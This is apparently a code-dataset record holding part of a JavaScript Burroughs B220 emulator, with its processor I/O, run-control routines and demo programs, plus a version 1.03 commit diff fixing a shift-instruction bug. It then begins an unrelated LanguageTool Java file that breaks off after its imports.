this.ioInitiate(); this.magTape.read(this.D.value, true); } break; case 0x54: //--------------------- MIW Magnetic tape initial write this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, false); } break; case 0x55: //--------------------- MIR Magnetic tape initial write, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, true); } break; case 0x56: //--------------------- MOW Magnetic tape overwrite this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, false); } break; case 0x57: //--------------------- MOR Magnetic tape overwrite, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, true); } break; case 0x58: //--------------------- MPF/MPB/MIE Magnetic tape position forward/backward/at end this.opTime = 0.130; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); switch (this.CCONTROL%0x10) { case 1: // MPB: position tape backward this.magTape.positionBackward(this.D.value); break; case 2: // MPE: position tape at end this.magTape.positionAtEnd(this.D.value); break; default: // MPF: position tape forward this.magTape.positionForward(this.D.value); break; } // switch on operation variant } break; case 0x59: //--------------------- MIB/MIE Magnetic tape interrogate, branch/end of tape, branch if (!this.magTape) { this.opTime = 0.01; } else if (this.magTape.controlBusy) { this.opTime = 0.01; } else { this.opTime = 0.14; if (this.CCONTROL%0x10 == 1) { // MIE if (this.magTape.testUnitAtEOT(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } else { // MIB if (this.magTape.testUnitReady(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } } this.operationComplete(); break; case 0x60: //--------------------- CRD Card read this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.inputInitiate(this.selectedUnit, this.rDigit, this.boundCardatronReceiveWord); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x61: //--------------------- CWR Card write this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.outputInitiate(this.selectedUnit, this.rDigit, this.vDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x62: //--------------------- CRF Card read, format load this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.inputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x63: //--------------------- CWF Card write, format load this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.outputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x64: //--------------------- CRI Card read interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.inputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x65: //--------------------- CWI Card write interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.outputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x66: //--------------------- HPW High speed printer write this.setProgramCheck(1); this.operationComplete(); break; case 0x67: //--------------------- HPI High speed printer interrogate, branch this.setProgramCheck(1); this.operationComplete(); break; default: //--------------------- Invalid op code -- set Program Check alarm this.setProgramCheck(1); this.operationComplete(); break; } // switch this.COP }; /*********************************************************************** * Processor Run Control * ***********************************************************************/ /**************************************/ B220Processor.prototype.operationComplete = function operationComplete() { /* Implements Operation Complete for the Execute cycle. If we're not locked in Execute, switch to Fetch cycle next */ if (this.FETCHEXECUTELOCKSW != 1) { this.EXT.set(0); // set to FETCH state } this.execClock += this.opTime; if (this.ORDERCOMPLEMENTSW) { this.C.flipBit(16); // complement low order bit of op code this.COP ^= 0x01; } if (!this.RUT.value) { // halted this.stop(); } else if (this.SST.value) { this.stop(); // single-stepping } else if (this.SONSW) { if (this.STOCSW) { // check for post-execute S-to-C stop if (this.SUNITSSW) { if (this.C.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.C.value%0x10000 == this.S.value) { this.stop(); } } } }; /**************************************/ B220Processor.prototype.ioComplete = function ioComplete(restart) { /* Implements completion of the Execute cycle for an I/O instruction that has been executing asynchronously. If "restart" is true, the Processor will resume automatic operation */ this.AST.set(0); this.asyncOff(); this.procOff(); this.operationComplete(); if (restart && this.RUT.value) { this.schedule(); } }; /**************************************/ B220Processor.prototype.ioInitiate = function ioInitiate() { /* Initiates asynchronous mode of the processor for I/O */ this.AST.set(1); this.asyncOn(); this.execLimit = 0; // kill the run() loop }; /**************************************/ B220Processor.prototype.traceState = function traceState() { /* Logs a subset of the Processor state to the Javascript console for debugging purposes */ console.log("P=" + B220Processor.padLeft(this.P.value.toString(16), 4) + " | B=" + B220Processor.padLeft(this.B.value.toString(16), 4) + " | C=" + B220Processor.formatWord(this.C.value).substring(2) + " | A=" + B220Processor.formatWord(this.A.value) + " | R=" + B220Processor.formatWord(this.R.value) + " | D=" + B220Processor.formatWord(this.D.value) + " | E=" + B220Processor.padLeft(this.E.value.toString(16), 4) + " | UET=" + this.UET.value + " | HIT=" + this.HIT.value + " | OFT=" + this.OFT.value + " | RPT=" + this.RPT.value); }; /**************************************/ B220Processor.prototype.run = function run() { /* Main execution control loop for the processor. Called from this.schedule() to initiate a time slice. Will continue fetch/execute cycles until the time slice expires, a stop condition is detected, or AST (asynchronous toggle) is set indicating the processor has been suspended during an I/O. This routine effectively implements Operation Complete (O.C.) for the Fetch and Execute cycles, although it is more of a "ready for next operation" function, determining if there is a stop condition, or whether to do a Fetch or Execute cycle next. The fetch() and execute() methods exit back here, and in most cases we simply step to the next cycle. In the case of asynchronous operation, however, we simply exit, and the I/O interface will call this.schedule() to restart execution again once memory transfers have completed */ this.execLimit = this.execClock + B220Processor.timeSlice; do { if (this.EXT.value) { // enter EXECUTE cycle this.execute(); } else { // enter FETCH cycle if (this.tracing) { this.traceState(); // DEBUG ONLY } if (this.SONSW) { // check for post-fetch S-to-P stop if (this.STOPSW) { // must check before P is incremented in fetch() if (this.SUNITSSW) { if (this.P.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.P.value == this.S.value) { this.stop(); } } } this.fetch(false); if (this.SST.value) { this.stop(); // single-stepping } break; } } while (this.execClock < this.execLimit); }; /**************************************/ B220Processor.prototype.schedule = function schedule() { /* Schedules the next processor time slice and attempts to throttle performance to approximate that of a real B220. It establishes a time slice in terms of a number milliseconds each and calls run() to execute for at most that amount of time. run() counts up instruction times until it reaches this limit or some terminating event (such as a stop), then exits back here. If the processor remains active, this routine will reschedule itself after an appropriate delay, thereby throttling the performance and allowing other modules to share the single Javascript execution thread */ var delayTime = 0; // delay from/until next run() for this processor, ms var stamp = performance.now(); // ending time for the delay and the run() call, ms this.scheduler = 0; // If run() has been called by a throttling delay, compute the delay stats. if (this.delayLastStamp > 0) { delayTime = stamp - this.delayLastStamp; this.procSlack += delayTime; // Compute the exponential weighted average of scheduling delay deviation. this.delayDeltaAvg = (delayTime - this.delayRequested)*B220Processor.delayAlpha + this.delayDeltaAvg*B220Processor.delayAlpha1; this.procSlackAvg = delayTime*B220Processor.slackAlpha + this.procSlackAvg*B220Processor.slackAlpha1; } // Execute the time slice. this.runStamp = stamp; // starting clock time for time slice this.procOn(); // prepare to accumulate internal processor time this.run(); stamp = performance.now(); this.procRunAvg = (stamp - this.runStamp)*B220Processor.slackAlpha + this.procRunAvg*B220Processor.slackAlpha1; // Determine what to do next. this.runStamp = stamp; // DEBUG: for DiagMonitor use only. if (!this.RUT.value) { // Processor is stopped, just inhibit delay averaging on next call and exit. this.delayLastStamp = 0; this.procOff(); // accumulate internal processor time for the slice } else if (this.AST.value) { // Processor is idle during I/O, but still accumulating clocks, so no procOff(). this.delayLastStamp = 0; } else { this.procOff(); // accumulate internal processor time for the slice // The processor is still running, so schedule next time slice after a // throttling delay. delayTime is the number of milliseconds the // processor is running ahead of real-world time. Web browsers have a // certain minimum setTimeout() delay. If the delay is less than our // estimate of that minimum, setCallback() will yield to the event loop // but otherwise continue (real time should eventually catch up -- we // hope). If the delay is greater than the minimum, setCallback() will // reschedule us after that delay. delayTime = this.execClock - stamp; this.delayRequested = delayTime; this.delayLastStamp = stamp; this.scheduler = setCallback(this.mnemonic, this, delayTime, schedule); } }; /**************************************/ B220Processor.prototype.start = function start() { /* Initiates a time slice for the processor according to the EXT state */ var stamp = performance.now(); if (this.poweredOn && !this.RUT.value && !this.AST.value && !this.digitCheckAlarm.value && !this.ALT.value && !this.MET.value && !this.TAT.value && !this.CRT.value && !this.PAT.value && !this.HAT.value && !this.systemNotReady.value && !this.computerNotReady.value) { this.execClock = stamp; this.asyncTime = 0; this.delayLastStamp = 0; this.delayRequested = 0; this.RUT.set(1); // Start the processor timer while (this.procTimer >= 0) { this.procTimer -= stamp; } // Start the run timer while (this.runTimer >= 0) { this.runTimer -= stamp; } this.updateLampGlow(1); // freeze state in the lamps this.schedule(); } }; /**************************************/ B220Processor.prototype.stop = function stop() { /* Stops running the processor on the Javascript thread */ var stamp = performance.now(); if (this.poweredOn) { this.execLimit = 0; // kill the time slice this.SST.set(0); this.RUT.set(0); this.AST.set(0); // Stop the timers this.asyncOff(); this.procOff(); // Stop the run timer while (this.runTimer < 0) { this.runTimer += stamp; } // Stop the processor timer while (this.procTimer < 0) { this.procTimer += stamp; } this.updateLampGlow(1); // freeze state in the lamps if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } } }; /**************************************/ B220Processor.prototype.step = function step() { /* Single-steps the processor. This will execute the next Fetch or Execute cycle only, then stop the processor */ if (this.poweredOn) { if (!this.RUT.value) { this.SST.set(1); this.start(); } } }; /**************************************/ B220Processor.prototype.setStop = function setStop() { /* Initiates a halt of the processor. The processor will execute through the end of the Execute cycle, then stop */ if (this.poweredOn) { if (this.RUT.value) { this.RUT.set(0); } else { this.stop(); } } }; /**************************************/ B220Processor.prototype.setCycle = function setCycle(cycle) { /* Sets the processor cycle to Fetch (0) or Execute (1) */ if (this.poweredOn) { if (!this.RUT.value) { this.EXT.set(cycle); } } }; /**************************************/ B220Processor.prototype.toggleCompareLamps = function toggleCompareLamps(condition) { /* Toggles the comparison lamps and sets the processor UET and HIT toggles according to the condition: <0=LOW, 0=EQUAL, >0=HIGH */ if (this.poweredOn) { if (condition < 0) { // LOW this.compareLowLamp.flip(); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); this.UET.set(this.compareLowLamp.value); this.HIT.set(0); } else if (condition > 0) { // HIGH this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.flip(); this.UET.set(this.compareHighLamp.value); this.HIT.set(this.compareHighLamp.value); } else { // EQUAL this.compareLowLamp.set(0); this.compareEqualLamp.flip(); this.compareHighLamp.set(0); this.UET.set(0); this.HIT.set(this.compareEqualLamp.value); } } }; /**************************************/ B220Processor.prototype.resetRunTimer = function resetRunTimer() { /* Resets the elapsed run-time timer to zero */ if (this.poweredOn) { this.instructionCount = 0; if (this.runTimer < 0) { // it's running, adjust its bias this.runTimer = -performance.now(); } else { // it's stopped, just zero it this.runTimer = 0; } } }; /**************************************/ B220Processor.prototype.resetTransfer = function resetTransfer() { /* Initiates a Reset and Transfer operation, storing P in address 0000/04 and C in 0000/64, then branching to address 0001. Always active, even when running */ if (this.poweredOn) { this.digitCheckAlarm.set(0); this.ALT.set(0); this.MET.set(0); this.TAT.set(0); this.CRT.set(0); this.PAT.set(0); this.HAT.set(0); this.E.set(0x0000); this.readMemory(); this.IB.set(this.IB.value - this.IB.value % 0x100000000 + (this.C.value % 0x10000)*0x10000 + this.P.value % 0x10000); this.writeMemory(); this.P.set(0x0001); if (this.AST.value) { // I/O in progress -- cancel it this.ioComplete(true); } else { this.EXT.set(0); // set to Fetch cycle } if (!this.RUT.value) { this.start(); } } }; /**************************************/ B220Processor.prototype.tcuClear = function tcuClear() { /* Clears the Tape Control Unit */ if (this.poweredOn) { if (this.magTape) { this.magTape.clearUnit(); } } }; /**************************************/ B220Processor.prototype.powerUp = function powerUp() { /* Powers up the system */ if (!this.poweredOn) { this.clear(); this.poweredOn = 1; this.procTimer = this.runTimer = this.instructionCount = 0; this.procTime = this.procSlack = 0; this.procSlackAvg = this.procRunAvg = 0; this.delayDeltaAvg = this.delayRequested = 0; this.console = this.devices.ControlConsole; this.cardatron = this.devices.CardatronControl; this.magTape = this.devices.MagTapeControl; this.computerNotReady.set(1); // initial state after power-up this.updateLampGlow(1); } }; /**************************************/ B220Processor.prototype.powerDown = function powerDown() { /* Powers down the system */ if (this.poweredOn) { this.stop(); this.clear(); this.poweredOn = 0; this.updateLampGlow(1); this.cardatron = null; this.console = null; this.magTape = null; if (this.glowTimer) { clearInterval(this.glowTimer); this.glowTimer = null; } } }; /**************************************/ B220Processor.prototype.loadDefaultProgram = function loadDefaultProgram() { /* Loads a set of default demo programs to the memory drum */ // Simple counter speed test this.MM[ 80] = 0x0000120082; // ADD 82 this.MM[ 81] = 0x0000300080; // BUN 80 this.MM[ 82] = 0x0000000001; // CNST 1 // Hello World this.MM[ 90] = 0x0030090092; // SPO 92 this.MM[ 91] = 0x0000009999; // HLT 9999 this.MM[ 92] = 0x21648455353; // LIT R'HELL' this.MM[ 93] = 0x25600665659; // LIT 'O WOR' this.MM[ 94] = 0x25344000016; // LIT 'LD 'R // Tom Sawyer's "Square Roots 100" adapted from the 205 for the 220 (Babylonian or Newton's method): this.MM[ 100] = 0x0000100139; // CAD 139 this.MM[ 101] = 0x0000400138; // STA 138 this.MM[ 102] = 0x0000100139; // CAD 139 this.MM[ 103] = 0x0002450000; // CLR this.MM[ 104] = 0x0001480005; // SRT 5 this.MM[ 105] = 0x0000150138; // DIV 138 this.MM[ 106] = 0x0000400137; // STA 137 this.MM[ 107] = 0x0000130138; // SUB 138 this.MM[ 108] = 0x0000400136; // STA 136 this.MM[ 109] = 0x0001100136; // CAA 136 this.MM[ 110] = 0x0000180135; // CFA 135 this.MM[ 111] = 0x0001340119; // BCL 119 this.MM[ 112] = 0x0000100138; // CAD 138 this.MM[ 113] = 0x0000120137; // ADD 137 this.MM[ 114] = 0x0002450000; // CLR this.MM[ 115] = 0x0001480005; // SRT 5 this.MM[ 116] = 0x0000150134; // DIV 134 this.MM[ 117] = 0x0000400138; // STA 138 this.MM[ 118] = 0x0000300102; // BUN 102 this.MM[ 119] = 0x5011090139; // SPO 139 this.MM[ 120] = 0x5011090137; // SPO 137 this.MM[ 121] = 0x0010090132; // SPO 132 this.MM[ 122] = 0x0000100139; // CAD 139 this.MM[ 123] = 0x0000120133; // ADD 133 this.MM[ 124] = 0x0000400139; // STA 139 this.MM[ 125] = 0x0000300102; // BUN 102 this.MM[ 126] = 0; this.MM[ 127] = 0; this.MM[ 128] = 0; this.MM[ 129] = 0; this.MM[ 130] = 0; this.MM[ 131] = 0; this.MM[ 132] = 0x20000000016; // carraige return this.MM[ 133] = 0x100000; this.MM[ 134] = 0x200000; this.MM[ 135] = 0x10; this.MM[ 136] = 0; this.MM[ 137] = 0; this.MM[ 138] = 0; this.MM[ 139] = 0x200000; // "Square Roots 100" adapted for floating-point and relative precision: this.MM[ 200] = 0x0000100239; // CAD 239 load initial argument this.MM[ 201] = 0x0000400238; // STA 238 store as initial upper bound this.MM[ 202] = 0x0000100239; // CAD 239 start of loop: load current argument this.MM[ 203] = 0x0002450000; // CR clear R this.MM[ 204] = 0x0000250238; // FDV 238 divide argument by upper bound this.MM[ 205] = 0x0000400237; // STA 237 store as current result this.MM[ 206] = 0x0000250238; // FDV 238 ratio to upper bound this.MM[ 207] = 0x0000400236; // STA 236 store as current precision this.MM[ 208] = 0x0001100235; // CAA 235 load target precision this.MM[ 209] = 0x0000230236; // FSU 236 subtract current precision this.MM[ 210] = 0x0001330218; // BSA 218,1 if current precision > target precision this.MM[ 211] = 0x0000010000; // NOP we're done -- jump out to print this.MM[ 212] = 0x0000100238; // CAD 238 load current upper bound this.MM[ 213] = 0x0000220237; // FAD 237 add current result this.MM[ 214] = 0x0002450000; // CR clear R this.MM[ 215] = 0x0000250234; // FDV 234 divide by 2.0 to get new upper bound this.MM[ 216] = 0x0000400238; // STA 238 store new upper bound this.MM[ 217] = 0x0000300202; // BUN 202 do another iteration this.MM[ 218] = 0x8011090239; // SPO 239 this.MM[ 219] = 0x8011090237; // SPO 237 this.MM[ 220] = 0x0010090232; // SPO 232 this.MM[ 221] = 0x0000010000; // NOP this.MM[ 222] = 0x0000100239; // CAD 239 load argument value this.MM[ 223] = 0x0000220233; // FAD 233 add 1 to argument value this.MM[ 224] = 0x0000400239; // STA 239 this.MM[ 225] = 0x0000300201; // BUN 201 start sqrt for next argument value this.MM[ 226] = 0; this.MM[ 227] = 0; this.MM[ 228] = 0; this.MM[ 229] = 0; this.MM[ 230] = 0; this.MM[ 231] = 0; this.MM[ 232] = 0x20202020216; // carriage return this.MM[ 233] = 0x05110000000; // 1.0 literal: argument increment this.MM[ 234] = 0x05120000000; // 2.0 literal this.MM[ 235] = 0x05099999990; // 0.99999990 literal: target precision this.MM[ 236] = 0; // current precision this.MM[ 237] = 0; // current sqrt result this.MM[ 238] = 0; // current upper bound on result this.MM[ 239] = 0x05120000000; // 2.0 sqrt argument // Print first 800 digits of Pi; adapted from C program by Dik Winter of CWI, Amsterdam this.MM[ 300]= 0x00000100371; // CAD FLIM this.MM[ 301]= 0x00000400365; // STA C C=FLIM this.MM[ 302]= 0x00000100363; // CAD A this.MM[ 303]= 0x00001480010; // SRT 10 this.MM[ 304]= 0x00000150375; // DIV FIVE A DIV 5 this.MM[ 305]= 0x00000420365; // LDB C FOR (B=C; B>=0; --B) this.MM[ 306]= 0x10000401000; // STA - F F[B]=A DIV 5 this.MM[ 307]= 0x00001210306; // DBB *-1,1 this.MM[ 308]= 0x00000100365; // L1 CAD C START OF OUTER LOOP this.MM[ 309]= 0x00000140374; // MUL TWO this.MM[ 310]= 0x00001400368; // STR G G=C*2 this.MM[ 311]= 0x00000370362; // BFR ENDL1,00,00 IF G EQL 0, BRANCH OUT OF LOOP this.MM[ 312]= 0x00000460366; // CLL D D=0 this.MM[ 313]= 0x00000100365; // CAD C this.MM[ 314]= 0x00000400364; // STA B B=C this.MM[ 315]= 0x00000420364; // LDB B this.MM[ 316]= 0x10000101000; // DO CAD - F START OF INNER LOOP this.MM[ 317]= 0x00000140363; // MUL A F[B]*A this.MM[ 318]= 0x00001490010; // SLT 10 SHIFT PRODUCT TO RA this.MM[ 319]= 0x00000120366; // ADD D this.MM[ 320]= 0x00000400366; // STA D D+=F[B]*A this.MM[ 321]= 0x00001480010; // SRT 10 SAVE NEW D IN RR this.MM[ 322]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 323]= 0x00000150368; // DIV G D DIV G this.MM[ 324]= 0x10001401000; // STR - F F[B]=D MOD G this.MM[ 325]= 0x00000400366; // STA D D=D DIV G this.MM[ 326]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 327]= 0x00000100364; // CAD B this.MM[ 328]= 0x00000130373; // SUB ONE this.MM[ 329]= 0x00000400364; // STA B B-=1 this.MM[ 330]= 0x00000360334; // BFA ENDDO,00,00 IF B EQL 0, BRANCH OUT OF INNER LOOP this.MM[ 331]= 0x00000140366; // MUL D this.MM[ 332]= 0x00001400366; // STR D D*=B this.MM[ 333]= 0x00001210316; // DBB DO,1 DECREMENT RB, REPEAT INNER LOOP IF >= 0 this.MM[ 334]= 0x00014270365; // ENDDO DFL C,00,14 C-=14 this.MM[ 335]= 0x00000100366; // CAD D this.MM[ 336]= 0x00001480010; // SRT 10 this.MM[ 337]= 0x00000150363; // DIV A D DIV A this.MM[ 338]= 0x00000120367; // ADD E RA=E+D DIV A this.MM[ 339]= 0x00001400367; // STR E E=D MOD A // FORMAT 4 DIGITS FOR SPO OUTPUT this.MM[ 340]= 0x00001480003; // SRT 3 ISOLATE HIGH-ORDER DIGIT IN A this.MM[ 341]= 0x00000120376; // ADD N80 CONVERT 1ST DIGIT TO ALPHA this.MM[ 342]= 0x00000490001; // SLA 1 this.MM[ 343]= 0x00001490001; // SLT 1 this.MM[ 344]= 0x00000120376; // ADD N80 CONVERT 2ND DIGIT TO ALPHA this.MM[ 345]= 0x00000490001; // SLA 1 this.MM[ 346]= 0x00001490001; // SLT 1 this.MM[ 347]= 0x00000120376; // ADD N80 CONVERT 3RD DIGIT TO ALPHA this.MM[ 348]= 0x00000490001; // SLA 1 this.MM[ 349]= 0x00001490001; // SLT 1 this.MM[ 350]= 0x00000120376; // ADD N80 CONVERT 4TH DIGIT TO ALPHA this.MM[ 351]= 0x00000490002; // SLA 2 INSERT TRAILING SPACE this.MM[ 352]= 0x00002430000; // LSA 2 SET SIGN TO TWO FOR ALPHA WORD this.MM[ 353]= 0x00000400364; // STA B STORE IN WORD BUFFER this.MM[ 354]= 0x00010090364; // SPO B,1 this.MM[ 355]= 0x00405260369; // IFL COL,04,1 CHECK FOR FULL LINE ON SPO this.MM[ 356]= 0x00000100369; // CAD COL this.MM[ 357]= 0x00000180370; // CFA ECOL this.MM[ 358]= 0x00001340308; // BCL L1 IF COL < ECOL, BRANCH this.MM[ 359]= 0x00010090377; // SPO CR,1 OUTPUT NEWLINES this.MM[ 360]= 0x00000460369; // CLL COL CLEAR COLUMN COUNTER this.MM[ 361]= 0x00000300308; // BUN L1 this.MM[ 362]= 0x00000007557; // ENDL1 HLT 7557 this.MM[ 363]= 0x00000010000; // A CNST 10000 this.MM[ 364]= 0x00000000000; // B CNST 0 this.MM[ 365]= 0x00000000000; // C CNST 0 this.MM[ 366]= 0x00000000000; // D CNST 0 this.MM[ 367]= 0x00000000000; // E CNST 0 this.MM[ 368]= 0x00000000000; // G CNST 0 this.MM[ 369]= 0x00000000000; // COL CNST 0 this.MM[ 370]= 0x00000000050; // ECOL CNST 50 this.MM[ 371]= 0x00000002800; // FLIM CNST 2800 this.MM[ 372]= 0x00000000000; // ZERO CNST 0 this.MM[ 373]= 0x00000000001; // ONE CNST 1 this.MM[ 374]= 0x00000000002; // TWO CNST 2 this.MM[ 375]= 0x00000000005; // FIVE CNST 5 this.MM[ 376]= 0x00000000080; // N80 CNST 80 this.MM[ 377]= 0x20202021616; // CR CNST 20202021616 NEWLINES this.MM[1000]= 0x00000000000; // F DEFN * ARRAY F[2800] // TEMP // Tape tests this.MM[ 400] = 0x1008500000; // MRW 1 this.MM[ 401] = 0x1002580000; // MPE 1 this.MM[ 402] = 0x1000540000; // MIW 0,1,10,100 this.MM[ 403] = 0x1750540100; // MIW 100,1,7,50 this.MM[ 404] = 0x1500550079; // MIR 79,1,5,00 this.MM[ 405] = 0x1101542000; // MIW 2000,1,1,1 // write an EOT block this.MM[ 406] = 0x1008500000; // MRW 1 this.MM[ 407] = 0x1000560000; // MOW 0,1,10,100 this.MM[ 408] = 0x1750560100; // MOW 100,1,7,50 this.MM[ 409] = 0x1500570079; // MOR 79,1,5,00 //this.MM[ 410] = 0x1101562000; // MOW 2000,1,1,1 this.MM[ 410] = 0x1110562000; // MOW 2000,1,1,10 // TEMP: block-length=10, should fire EOT control word this.MM[ 411] = 0x1008500000; // MRW 1 this.MM[ 412] = 0x1000523000; // MRD 3000,1,10,0 this.MM[ 413] = 0x1700524000; // MRD 4000,1,7,0 this.MM[ 414] = 0x1500534350; // MRR 4350,1,5,0 this.MM[ 415] = 0x1100534800; // MRR 4800,1,1,0 // should be an EOT block this.MM[ 416] = 0x1009500000; // MDA 1 this.MM[ 417] = 0x7777009999; // HLT 9999,7777 this.MM[ 79] = 0x1900000000; // preface for 19 words, 80-98 this.MM[ 99] = 0x4000000000; // preface for 40 words, 100-139 this.MM[ 140] = 0x5800000000; // preface for 58 words, 141-198 this.MM[ 199] = 0x9900000000; // preface for 99 words, 200-298 this.MM[ 299] = 0x0000000000; // preface for 100 words, 300-399 this.MM[2000] = 0x9920012002; // end-of-tape control word this.MM[2001] = 0x9999999999; // storage for end-of-tape block state this.MM[2002] = 0x9999008421; // HLT: target for end-of-tape control branch this.MM[2003] = 0x0000300411; // branch to read test sequence };
Release emulator version 1.03. Fix bug in SLS for rotate counts > 10, as revealed by the TR1203 Operations Test diagnostic.
emulator/B220Processor.js
Release emulator version 1.03.
<ide><path>mulator/B220Processor.js <ide> * Global Constants * <ide> ***********************************************************************/ <ide> <del>B220Processor.version = "1.02a"; <add>B220Processor.version = "1.03"; <ide> <ide> B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) <ide> B220Processor.cyclesPerMilli = 1/B220Processor.tick; <ide> switch (this.CCONTROL%0x10) { <ide> case 1: // SLT: Shift Left A and R <ide> x = this.CADDR % 0x20; <del> if (x < 0x10) { <del> this.opTime = 0.210 - x*0.005; <del> } else { <del> this.opTime = 0.160 - (x-0x10)*0.005; <del> } <del> <add> this.opTime = 0.210 - x*0.005; <ide> this.DC.set(x); <del> w = this.R.value % 0x10000000000; // R sign is not affected <del> this.A.value %= 0x10000000000; // discard the A sign <add> w = this.R.value % 0x10000000000; // the R sign is not affected <add> this.A.value %= 0x10000000000; // discard the A sign for now <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; <ide> this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign <ide> break; <ide> case 2: // SLS: Shift Left A with Sign <del> x = this.CADDR % 0x10; <add> w = this.A.value % 0x100000000000; // the A sign is included in the rotate <add> d = w % 0x10; // always do one more rotate right <add> w = (w-d)/0x10 + d*0x10000000000; // than the count calls for <add> x = this.CADDR % 0x20; <add> if (x >= 0x10) { <add> x -= 0x10; // if the count is at least 10 <add> d = w % 0x10; // do one additional rotate right <add> w = (w-d)/0x10 + d*0x10000000000; <add> } <add> <ide> this.opTime = 0.160 - x*0.005; <ide> this.DC.set(0x10+x); <del> w = this.A.value % 0x100000000000; // A sign is included <del> d = w % 0x10; // do one more rotate right <del> w = (w-d)/0x10 + d*0x10000000000; // than the count calls for <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + d*0x10000000000; <ide> x = this.CADDR % 0x10; <ide> this.opTime = 0.160 - x*0.005; <ide> this.DC.set(0x10+x); <del> w = this.A.value % 0x10000000000; // A sign is not affected <add> w = this.A.value % 0x10000000000; // discard the A sign for now <ide> while (this.DC.value < 0x20) { <ide> d = w % 0x10; <ide> w = (w-d)/0x10 + d*0x1000000000;
Java
lgpl-2.1
cfa2242291cece3d71a6befa6fdb7a0e182adf1b
0
languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool,languagetool-org/languagetool
/* LanguageTool, a natural language style checker * Copyright (C) 2007 Daniel Naber (http://www.danielnaber.de) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 * USA */ package org.languagetool.language; import com.google.common.cache.CacheBuilder; import com.google.common.cache.CacheLoader; import com.google.common.cache.LoadingCache; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import org.languagetool.*; import org.languagetool.chunking.Chunker; import org.languagetool.chunking.EnglishChunker; import org.languagetool.languagemodel.LanguageModel; import 